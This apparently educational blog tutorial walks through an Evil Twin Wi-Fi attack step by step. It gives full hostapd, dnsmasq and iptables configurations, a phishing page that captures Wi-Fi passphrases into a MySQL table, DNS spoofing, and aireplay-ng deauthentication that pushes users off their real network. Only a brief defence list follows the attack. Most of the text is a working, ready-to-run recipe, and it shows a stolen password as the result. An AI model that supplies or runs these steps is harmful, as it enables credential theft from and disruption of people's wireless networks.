Wireless protocols have drastically evolved since 2003 after the invention of WPA in terms of secured Wi-Fi access. These days, wireless networks have become a part of our daily life. Almost every home, business, corporate sectors, stores, industries, and institutions have their personal Wireless AP (Access Point). Moreover, to make the internet free to every individual, some organizations have established public open Wi-Fi APs in almost every public place, like airports, railway stations, libraries, bus terminals, etc. But when the question comes about security, even after implementing the best security practices available, a wireless network will always be less secure than a wired network, just like David Bernstein once said, “FOR EVERY LOCK, THERE IS SOMEONE OUT THERE TRYING TO PICK IT OR BREAK IT”.
An Evil Twin is like a rogue Wi-Fi AP (Access Point), where an attacker creates a fake AP to lure the users into thinking it is a trusted wireless network. The attacker amplifies the signal in a way that the victim automatically connects to the rogue AP because of its faster beaconing and strong range.
Practical Scenario: The logic behind an Evil Twin attack is so simple, you just have to create a fake access point with the same name of the targeted Wi-Fi. Then you need to create a webpage to show the victim that he needs to enter the password to access the internet and store it in a database.
Prerequisites: Below is a list of hardware and software used in this article. You can use any hardware as long as it is compatible with the software you will be using.
Hardware Used:
- A Laptop (4gb RAM, Intel i5 processor)
- USB Wireless TP-LINK Adapter – 150MBPS (TP-Link WN722N)
- Wi-Fi dongle for internet connection / Ethernet with internet connectivity
Software Used:
- VMWare workstation 14
- Kali Linux 2019.2 OS
- Airmon-ng, Airodump-ng, Airplay-ng
- Dnsmasq
- Iptables
- Apache2
- Mysql
- Hostapd
Note:
Hostapd: It is used to create a fake targeted access point, be it WEP, WPA, WPA2 personal or enterprise secured. It should work.
Dnsmasq: It is used to resolve DNS requests from/to a host. It can also act as a DHCP server.
Apache: It acts as a web-server to the victim. It will basically host the phishing webpage in the attacker’s system.
Mysql: It is used to store the credentials in the database, entered from the website.
Iptables: It is a firewall, used for the Linux based systems.
Step 1: Setup Environment
Update the operating system and install required packages.
- sudo apt-get install update
- sudo apt-get install dnsmasq hostapd apache2
Step 2: Configuration of NetworkManager
Before starting monitor mode, make sure your NetworkManager and airmon-ng don’t conflict with each other.
Open the configuration file of the NetworkManager and put the MAC address of the device that you want your NetworkManager to stop managing.
- gedit /etc/NetworkManager/NetworkManager.conf
Now add the lines mentioned below at the end of the file:
- [keyfile]
unmanaged-devices:mac=AA:BB:CC:DD:EE:FF, A2:B2:C2:D2:E2:F2
Note:
Please change AA:BB:CC:DD:EE:FF(eth0) and A2:B2:C2:D2:E2:F2(wlan0) with your respective MAC Addresses.
Step 3: Setup Wireless Interface
Find the wireless interface using iwconfig command. In my case it is wlan0:
- iwconfig
Put the wireless interface in monitor mode using ‘airmon-ng’. A new interface will be created, in this case it is wlan0mon.
- airmon-ng start wlan0
Now it’s time to start monitoring all the AIR packets using ‘airodump-ng’.
- airodump-ng wlan0mon
In this case, I will target CH 9. Please note the target details.
- BSSID: It is used to describe sections of a wireless local area network or WLAN. It recognizes the access point or router because it has a unique address that creates the wireless network.
- CH (Channel number): It is the medium through which our wireless networks can send and receive data.
- ESSID: It is an electronic marker or identifier that serves as an identification and address for your computer, or network device to connect to a wireless router or access point and then access the internet.
(Optional Step): Set tx-power of Wi-Fi card to max: 1000mW to set the best range
- ifconfig wlan0mon down # Bring down the interface
- iw reg set US # Set region to be US
- ifconfig wlan0mon up # Bring the interface up
- iwconfig wlan0mon # Check tx-power, should be 30dBm
● tx-power stands for transmission power. By default it is set to 20dBm (Decibel metre) or 100mW.
● tx-power in mW increases 10 times with every 10 dBm. See the dBm to mW table.
If your country is set to US (United State) during installation,.your card should operate on 30 dBm (1000 mW)
Step 4: Setup Fake Access point
First of all, create a directory called “fakeap” under /root/fakeap.
- mkdir /root/fakeap
- cd /root/fakeap
Now create a new hostapd configuration file here and paste the below code inside it.
- gedit hostapd.conf
Code:
interface=wlan0mon
driver=nl80211
ssid=[Fake AP Name] //Take it from the airodump-ng result
hw_mode=g
channel=[Fake AP Channel] //Take it from the airodump-ng result
macaddr_acl=0
ignore_broadcast_ssid=0
Note:
interface: Monitor mode Wireless Interface to use.
ssid: Fake Access Point ESSID (name).
channel: Fake AP Channel to operate on.
Next we just have to execute the .conf file using the below command and our rogue access point will be up and running.
- hostapd hostapd.conf
Step 5: Set up DHCP
We will use dnsmasq to set up DHCP in the attacker machine. Dnsmasq with the support of forwarder is certainly fast and easy to modify and execute.
Open the terminal and create a configuration file for dnsmasq and paste the below code in it.
- Gedit dnsmasq.conf
Code
interface=wlan0mon
dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h
dhcp-option=3,192.168.1.1
dhcp-option=6,192.168.1.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1
Note:
dhcp-range: IP Range for network clients. 12h is the lease time.
dhcp-option=3: Gateway IP for the networks.
dhcp-option=6: DNS Server.
listen-address: Bind DHCP to local IP.
Next you have to create the network gateway and assign netmask to the interface and add it in the routing table.
- ifconfig wlan0mon up 192.168.1.1 netmask 255.255.255.0
- route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1
Now, let’s start the dnsmasq server.
Step6: Enable NAT by setting Firewall rules in iptables and set port forwarding
Enter the following commands to set-up NAT
- iptables –flush
- iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
- iptables --append FORWARD --in-interface wlan0mon -j ACCEPT
- iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.1.1:80
- iptables -t nat -A POSTROUTING -j MASQUERADE
Now we will setup the port forwarding.
- echo 1 > /proc/sys/net/ipv4/ip_forward
Step 7: Setup Phishing Site
We need a phishing site like a forged document or falsified page, where the user will be lured to enter the passphrase which will be stored in the attacker database.
You can create your own web application but let’s just download from the below link for now.
Extract the .zip file in /root/fakeap/rogueap.
- unzip rogueap.zip
Next move the content of rogueap/ to /var/www/html directory. Before that don’t forget to clean the content of /var/www/html.
- rm -rf /var/www/html/*
- mv root/fakeap/rogueap/* /var/www/html/
Step 8: Setup Apache server and Mysql database
We need a webserver to host the phishing website in the attacker’s machine. Please execute the below command to start the apache2 server.
- service apache2 start
So we have our phishing web application ready. Now we require a database to store the passwords the victim will type and submit.
Open Mysql and execute the below commands.
- service mysql start
- mysql
- mysql> create database rogueap;
- mysql> create user rogueuser;
- mysql> grant all on rogueap.* to 'rogueuser'@'localhost' identified by 'roguepassword';
- mysql> use rogueap;
- mysql> create table wpa_keys(password1 varchar(30), password2 varchar(30));
- mysql> ALTER DATABASE rogueap CHARACTER SET 'utf8';
Note: Don’t change any values in the above mentioned queries and inside /var/www/html/dbconnect.php, because this is where the credentials are defined. If you change any value of the database configuration you have to modify everywhere.
Step 9: DNS spoof and De-authentication
Now, just redirect the traffic to the Gateway IP of our forged network using dnsspoof.
- dnsspoof -i wlan0mon
Finally, to make the targeted Wi-Fi down we will use airplay-ng, which will deauthenticate every user from the targeted Wi-Fi and make it unavailable by sending a high number of requests from our machine. That will force the victim to connect to our rogue access point.
Please execute the below command in the terminal window to de-authenticate the target.
- aireplay-ng -00 -a AA:BB:CC:DD:EE:FF wlan0mon
- Note: AA:BB:CC:DD:EE:FF, is the targeted Wi-Fi’s BSSID, you can get it from the result of airodump-ng.
Now, you just have to wait for the victim to connect with the Wi-Fi and visit any website, it will redirect to the phishing website.
The moment the victim enters the password it will be stored in our mysql database. To check the password, please execute the below query in mysql.
- mysql> select * from wpa_keys;
The password is: p@ssword123
So that’s it. That is how you can create an Evil Twin and steal the password from the targeted Wi-Fi.
Defending Against an Evil Twin Attack
- The best way to defend against the Evil Twin attack is to know about the tactic so that you can understand in which situation it should be taken as suspicious.
- The moment you feel you abruptly disconnected from your trusted network and suddenly see an open wireless network with the same name of your trusted AP, you should take it as an abnormal incident.
- It is recommended to never connect to an open Wi-Fi network, especially those who do not have encrypted communication.
- If you see the router is updating, you can turn your Wi-Fi off and connect it via LAN to know what is going on.
- For validation purposes, you can connect with the open network from a restricted environment (sandbox) and check if it is asking for any credentials, put in any random credentials and see the response.
